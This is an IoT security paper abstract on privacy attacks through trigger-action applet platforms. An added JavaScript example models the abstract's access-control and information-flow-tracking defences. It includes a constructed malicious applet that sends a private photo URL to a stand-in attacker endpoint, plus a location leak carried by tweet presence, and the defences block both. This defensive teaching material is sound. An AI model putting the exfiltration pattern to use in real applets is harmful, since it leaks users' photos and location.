If This Then What?: Controlling Flows in IoT Apps

IoT apps empower users by connecting a variety of otherwise unconnected services. These apps (or applets) are triggered by external information sources to perform actions on external information sinks. We demonstrate that the popular IoT app platforms, including IFTTT (If This Then That), Zapier, and Microsoft Flow, are susceptible to attacks by malicious applet makers, including stealthy privacy attacks that exfiltrate private photos, leak user location, and eavesdrop on user input to voice-controlled assistants. We study a dataset of 279,828 IFTTT applets from more than 400 services, classify the applets according to the sensitivity of their sources, and find that 30% of the applets may violate privacy. We propose two countermeasures for short- and long-term protection: access control and information flow control. For short-term protection, we suggest that access control classifies an applet as either exclusively private or exclusively public, thus breaking flows from private sources to sensitive sinks. For long-term protection, we develop a framework for information flow tracking in IoT apps. The framework models applet reactivity and timing behavior, while at the same time faithfully capturing the subtleties of attacker observations caused by applet output. We show how to implement the approach for an IFTTT-inspired setting, leveraging state-of-the-art information flow tracking techniques for JavaScript based on the JSFlow tool, and evaluate its effectiveness on a collection of applets.
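The two countermeasures in the abstract can be made concrete in a few dozen lines. The following is an added example, not code from the paper, from IFTTT or from JSFlow: a toy model of trigger-action applets whose filter code runs in JavaScript, with (a) the short-term access-control check that classifies an applet as exclusively private or exclusively public and rejects a private trigger wired to a public action, and (b) a minimal dynamic label-tracking run that catches both an explicit private-to-public flow (a maker-controlled URL carrying a photo link) and an implicit one (output that appears only when a private condition holds). The service names and sensitivities, the ingredient fields, the attacker endpoint and the rule that an applet touching a private service on either side counts as private are all assumptions made for illustration.

```javascript
// Added example, not code from the paper, IFTTT or JSFlow: a toy model of
// trigger-action applets showing (a) the short-term access-control check that
// labels an applet exclusively private or exclusively public, and (b) a
// minimal dynamic label-tracking run that stops private-to-public flows in
// applet filter code. Service names, sensitivities, ingredient fields and the
// attacker endpoint are all constructed for illustration.

// Sensitivity of each service, whether it acts as trigger (source) or action (sink).
const SERVICES = {
  Photos:   { sensitivity: 'private' },  // assumed: the user's own photos
  Location: { sensitivity: 'private' },
  Weather:  { sensitivity: 'public' },
  Twitter:  { sensitivity: 'public' },
  Webhooks: { sensitivity: 'public' },   // any URL the applet maker picks is public
};

// (a) Access control: keep applets exclusively private or exclusively public.
// A private trigger wired to a public action is exactly the flow to break.
function classifyApplet(applet) {
  const src = SERVICES[applet.trigger.service].sensitivity;
  const dst = SERVICES[applet.action.service].sensitivity;
  if (src === 'private' && dst === 'public') return 'reject';
  // Assumed rule: an applet touching a private service on either side is private.
  return src === 'private' || dst === 'private' ? 'private' : 'public';
}

// (b) Information flow tracking: every ingredient carries the label of its
// source, filter-code operations propagate labels, and the sink is checked.
const lv = (value, label) => ({ value, label });
const join = (a, b) => (a === 'private' || b === 'private' ? 'private' : 'public');

function concat(...parts) {            // explicit flow: result is as secret as any part
  return lv(parts.map(p => p.value).join(''),
            parts.reduce((acc, p) => join(acc, p.label), 'public'));
}
function encodeUri(x) { return lv(encodeURIComponent(x.value), x.label); }

// Implicit flow: deciding whether to produce output based on a private value
// leaks it, because the attacker observes that output appeared (or did not).
function branch(cond, thenFn, elseFn) {
  const r = cond.value ? thenFn() : elseFn();
  return lv(r.value, join(r.label, cond.label));   // raise by the branch condition
}

// Sink check: a public sink may only receive public-labelled data.
function emit(sinkService, field) {
  if (SERVICES[sinkService].sensitivity === 'public' && field.label === 'private') {
    return { blocked: true, reason: `private data would reach public sink ${sinkService}` };
  }
  return { blocked: false, value: field.value };
}

function runApplet(applet, ingredients) {
  return emit(applet.action.service, applet.filter(ingredients));
}

// Constructed malicious applet: the maker appends the private photo URL to an
// endpoint they control and sends it to a public webhook.
const exfilApplet = {
  trigger: { service: 'Photos' },
  action:  { service: 'Webhooks' },
  filter(ing) {
    const mine = lv('https://attacker.example/collect?u=', 'public'); // assumed host
    return concat(mine, encodeUri(ing.photoUrl));
  },
};

// Constructed applet leaking location only through the presence of a tweet.
const presenceApplet = {
  trigger: { service: 'Location' },
  action:  { service: 'Twitter' },
  filter(ing) {
    return branch(ing.atHome, () => lv('Home sweet home', 'public'), () => lv('', 'public'));
  },
};

// Constructed benign applet: public weather data tweeted publicly.
const benignApplet = {
  trigger: { service: 'Weather' },
  action:  { service: 'Twitter' },
  filter(ing) { return concat(lv('Forecast: ', 'public'), ing.summary); },
};

// Ingredients arrive already labelled with the sensitivity of the trigger's service.
function ingredientsFor(applet, fields) {
  const label = SERVICES[applet.trigger.service].sensitivity;
  return Object.fromEntries(Object.entries(fields).map(([k, v]) => [k, lv(v, label)]));
}

function demo() {
  return {
    exfilClass:  classifyApplet(exfilApplet),                                   // 'reject'
    exfilRun:    runApplet(exfilApplet, ingredientsFor(exfilApplet, { photoUrl: 'https://photos.example/u/1/a.jpg' })),
    presenceRun: runApplet(presenceApplet, ingredientsFor(presenceApplet, { atHome: true })),
    benignClass: classifyApplet(benignApplet),                                  // 'public'
    benignRun:   runApplet(benignApplet, ingredientsFor(benignApplet, { summary: 'sunny' })),
  };
}
```

The access-control check alone already rejects the exfiltration applet because its trigger is private and its action public; the label tracking is what catches the subtler case, where the maker's URL is itself public but the value glued onto it is not, and the presence leak, where every emitted string is public and only the decision to emit depends on private data. A real tracker (JSFlow in the paper's setting) has to do the same label joins across all of JavaScript's operations, not just the two helpers modelled here.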